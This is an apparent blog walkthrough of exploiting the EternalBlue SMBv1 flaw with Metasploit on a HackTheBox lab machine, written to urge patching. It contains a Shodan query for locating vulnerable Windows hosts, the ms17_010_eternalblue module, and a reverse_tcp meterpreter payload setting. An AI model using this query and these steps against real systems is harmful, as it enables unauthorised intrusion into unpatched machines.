Metasploit: EternalBlue Exploit

If you have heard of WannaCry or NotPetya, you have most likely heard of EternalBlue.
EternalBlue exploits the flaws in the SMBv1 protocol. Although it was patched back in 2017, it’s still at large today. Below is an example taken from Shodan.io.

https://www.shodan.io/report/VyH5ik4Y

This is a simple guide to show how easy an attacker can exploit this vulnerability using Metasploit. Hopefully it will highlight why you need to patch those systems asap. Just to note, the system that I exploited was part of HackTheBox.eu.

Msfconsole will already been installed and setup if you are running Kali or Parrot OS.
Here you can use a range of tools to identify your target and find a vulnerable system.
Metasploit exploits directory: /usr/share/metasploit-framework/modules/exploits

If you are using Shodan, you can use the follow query:
port:445 “SMB Version: 1” os:Windows !product:Samba

*Remember that if you exploit machines you have found on Shodan, you will be breaking the law.

Once you have span up Metasploit by using msfconsole, you could use the SMB Scanner to scan your target to verify the version:

Once you have your target, the next step is to use the exploit. You can find EternalBlue exploits using the ExploitDB: https://www.exploit-db.com/

For this example, we will use ms17_010_eternalblue

You will need to set the target using set rhost [Target IP]

If successful, you will have yourself a shell….

If not, you might need to set the payload like so: set payload windows/x64/meterpreter/reverse_tcp

And that’s it. Pretty simple right?

If you are viewing this and you have vulnerable systems of your own, please do patch or remediate the threat in other ways.

One Reply to “Metasploit: EternalBlue Exploit”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s